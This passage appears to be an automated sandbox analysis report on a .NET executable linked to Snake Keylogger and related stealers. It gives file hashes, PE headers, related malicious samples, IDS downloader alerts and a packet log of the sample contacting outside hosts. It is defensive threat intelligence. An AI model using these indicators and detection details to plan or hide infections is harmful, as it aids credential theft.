	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	REQUEST FOR QUOTATION.js	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	188.114.97.3
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1wD-DOvNLKuM60BZj5TLzFjKI87o3EE-OVAmvFF0fxPk/preview?usp=sharing	Get hash	malicious	Unknown	Browse	188.114.97.3
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse	149.154.167.220
	REQUEST FOR QUOTATION.js	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	149.154.167.220
	Payment-Remittance_pdfrexel.se959575798273.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDoc5633276235623657_xls.exe	Get hash	malicious	StormKitty, XWorm	Browse	149.154.167.220
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	149.154.167.220
	sRMytgfRpJ.exe	Get hash	malicious	RedLine	Browse	149.154.167.220
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.249987035908726
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	TLS20242025.exe
File size:	920'064 bytes
MD5:	bfabeaf94d00b7c6b4af9aa3463ff5a5
SHA1:	0d9341d70a1e7e90c62ebcef43d1fcd2cf1b3506
SHA256:	e03a2edda2530392f416b8d64b85a3ae890120e6c6d08317d21ac133576cb45d
SHA512:	7058bf27c2fb70b564d2ac56a6be82b894abf911167c5d979049cf73c7ecd512ae392f84341d837747f0ba19428ae83c546c0e3e1727c0faad72f63bf47c6cf1
SSDEEP:	12288:nQTfnBGYPexcjnR+iBlVDruhxBdae9yAaeNhmXGj4qSOU:4BGYWxcjRJPruhxBzUAi1zOU
TLSH:	C115CF4437F8096AE9FF4BB8F4B01034C6BAFC16961FF74D9585A0F909B37019A40A76
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...am............"...0.................. ... ....@.. .......................`............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4e1ece
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEA086D61 [Thu Jun 3 16:27:13 2094 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe1e74	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe2000	0x576	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xdfed4	0xe0000	f00e6bdee5aa65d630dd07f41eea8b32	False	0.5330843244280133	data	7.257003686976549	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe2000	0x576	0x600	6bdba2d938cec3a01da651a16db3d6cd	False	0.4088541666666667	data	3.994648161937343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe4000	0xc	0x200	4de22df61ab82bd09902cd9c027a1219	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe20a0	0x2ec	data			0.43716577540106955
RT_MANIFEST	0xe238c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T15:19:06.686781+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49710	193.122.130.0	80	TCP
2024-09-26T15:19:07.811792+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49710	193.122.130.0	80	TCP
2024-09-26T15:19:08.396649+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49715	188.114.97.3	443	TCP
2024-09-26T15:19:08.921191+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49717	193.122.130.0	80	TCP
2024-09-26T15:19:10.641160+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49720	188.114.97.3	443	TCP
2024-09-26T15:19:11.733633+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49724	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 15:19:05.652606010 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:05.658149004 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:05.658256054 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:05.659281969 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:05.664112091 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:06.122944117 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:06.166923046 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:06.171946049 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:06.640362978 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:06.686780930 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:06.975997925 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:06.976094007 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:06.976243019 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:06.988984108 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:06.989016056 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.463079929 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.463167906 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.469176054 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.469208002 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.469682932 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.514933109 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.536870956 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.579425097 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.645138025 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.645370007 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.645442009 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.652160883 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.657269001 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:07.662177086 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:07.760487080 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:07.765055895 CEST	49715	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.765156984 CEST	443	49715	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.765252113 CEST	49715	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.765949965 CEST	49715	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:07.765985966 CEST	443	49715	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:07.811791897 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:08.236881018 CEST	443	49715	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:08.240463018 CEST	49715	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:08.240495920 CEST	443	49715	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:08.396745920 CEST	443	49715	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:08.397018909 CEST	443	49715	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:08.397098064 CEST	49715	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:08.397790909 CEST	49715	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:08.401820898 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:08.403162003 CEST	49717	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:08.406990051 CEST	80	49710	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:08.407057047 CEST	49710	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:08.408124924 CEST	80	49717	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:08.408219099 CEST	49717	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:08.408338070 CEST	49717	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:08.413367033 CEST	80	49717	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:08.864907026 CEST	80	49717	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:08.869179964 CEST	49718	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:08.869240046 CEST	443	49718	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:08.869343996 CEST	49718	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:08.869656086 CEST	49718	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:08.869674921 CEST	443	49718	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:08.921190977 CEST	49717	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:09.407254934 CEST	443	49718	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:09.409394979 CEST	49718	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:09.409424067 CEST	443	49718	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:09.541712046 CEST	443	49718	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:09.541897058 CEST	443	49718	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:09.542001009 CEST	49718	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:09.542663097 CEST	49718	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:09.547871113 CEST	49719	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:09.553009987 CEST	80	49719	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:09.553170919 CEST	49719	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:09.553265095 CEST	49719	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:09.558110952 CEST	80	49719	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:10.027354956 CEST	80	49719	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:10.028781891 CEST	49720	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:10.028844118 CEST	443	49720	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:10.028920889 CEST	49720	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:10.029198885 CEST	49720	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:10.029211998 CEST	443	49720	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:10.077553988 CEST	49719	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:10.494878054 CEST	443	49720	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:10.496982098 CEST	49720	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:10.497006893 CEST	443	49720	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:10.641309977 CEST	443	49720	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:10.641587973 CEST	443	49720	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:10.641648054 CEST	49720	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:10.642102957 CEST	49720	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:10.646418095 CEST	49719	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:10.647695065 CEST	49722	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:10.651679993 CEST	80	49719	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:10.651748896 CEST	49719	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:10.652641058 CEST	80	49722	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:10.652725935 CEST	49722	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:10.652905941 CEST	49722	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:10.657819033 CEST	80	49722	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:11.118120909 CEST	80	49722	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:11.119896889 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:11.119949102 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:11.120049953 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:11.120572090 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:11.120590925 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:11.171160936 CEST	49722	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:11.604012966 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:11.606028080 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:11.606051922 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:11.733767986 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:11.734016895 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:11.734329939 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:11.734618902 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:11.739625931 CEST	49725	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:11.739641905 CEST	49722	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:11.744489908 CEST	80	49725	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:11.744621038 CEST	49725	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:11.744726896 CEST	49725	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:11.745012045 CEST	80	49722	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:11.745229006 CEST	49722	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:11.750215054 CEST	80	49725	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:12.204050064 CEST	80	49725	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:12.205915928 CEST	49726	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:12.205972910 CEST	443	49726	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:12.206067085 CEST	49726	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:12.206670046 CEST	49726	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:12.206687927 CEST	443	49726	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:12.249310017 CEST	49725	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:12.674756050 CEST	443	49726	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:12.676975965 CEST	49726	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:12.677010059 CEST	443	49726	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:12.825274944 CEST	443	49726	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:12.825396061 CEST	443	49726	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:12.825445890 CEST	49726	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:12.826114893 CEST	49726	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:12.830832958 CEST	49725	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:12.832290888 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:12.836149931 CEST	80	49725	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:12.836210012 CEST	49725	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:12.837189913 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:12.837258101 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:12.837373972 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:12.842282057 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:13.314461946 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:13.315871000 CEST	49728	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:13.315913916 CEST	443	49728	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:13.315984011 CEST	49728	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:13.316318989 CEST	49728	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:13.316329956 CEST	443	49728	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:13.358661890 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:13.777332067 CEST	443	49728	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:13.786772966 CEST	49728	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:13.786806107 CEST	443	49728	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:13.928745031 CEST	443	49728	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:13.929035902 CEST	443	49728	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:13.929105043 CEST	49728	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:13.929550886 CEST	49728	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:13.934082985 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:13.935256004 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:13.939229965 CEST	80	49727	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:13.939285994 CEST	49727	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:13.940248013 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:13.940326929 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:13.940435886 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:13.945573092 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:14.406107903 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:14.408034086 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:14.408143997 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:14.408237934 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:14.408560991 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:14.408628941 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:14.452447891 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:14.885658979 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:14.887407064 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:14.887450933 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:15.015572071 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:15.015695095 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:15.015813112 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:15.016679049 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:15.029475927 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:15.030842066 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:15.034676075 CEST	80	49729	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:15.034781933 CEST	49729	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:15.035733938 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:15.035811901 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:15.035927057 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:15.040680885 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:15.511804104 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:15.513346910 CEST	49733	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:15.513447046 CEST	443	49733	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:15.513639927 CEST	49733	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:15.513859034 CEST	49733	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:15.513895988 CEST	443	49733	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:15.561886072 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:15.971615076 CEST	443	49733	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:15.973306894 CEST	49733	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:15.973325014 CEST	443	49733	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:16.118076086 CEST	443	49733	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:16.118215084 CEST	443	49733	188.114.97.3	192.168.2.6
Sep 26, 2024 15:19:16.118283033 CEST	49733	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:16.156883001 CEST	49733	443	192.168.2.6	188.114.97.3
Sep 26, 2024 15:19:16.180550098 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:16.185941935 CEST	80	49731	193.122.130.0	192.168.2.6
Sep 26, 2024 15:19:16.186042070 CEST	49731	80	192.168.2.6	193.122.130.0
Sep 26, 2024 15:19:16.200383902 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:16.200433969 CEST	443	49734	149.154.167.220	192.168.2.6
Sep 26, 2024 15:19:16.200522900 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:16.205782890 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:16.205801010 CEST	443	49734	149.154.167.220	192.168.2.6
Sep 26, 2024 15:19:16.828135967 CEST	443	49734	149.154.167.220	192.168.2.6
Sep 26, 2024 15:19:16.828481913 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:16.830562115 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:16.830573082 CEST	443	49734	149.154.167.220	192.168.2.6
Sep 26, 2024 15:19:16.830918074 CEST	443	49734	149.154.167.220	192.168.2.6
Sep 26, 2024 15:19:16.832509995 CEST	49734	443	192.168.2.6	149.154.167.220
Sep 26, 2024 15:19:16.879400969 CEST	443	49734	149.154.167.220	192.168.2.6
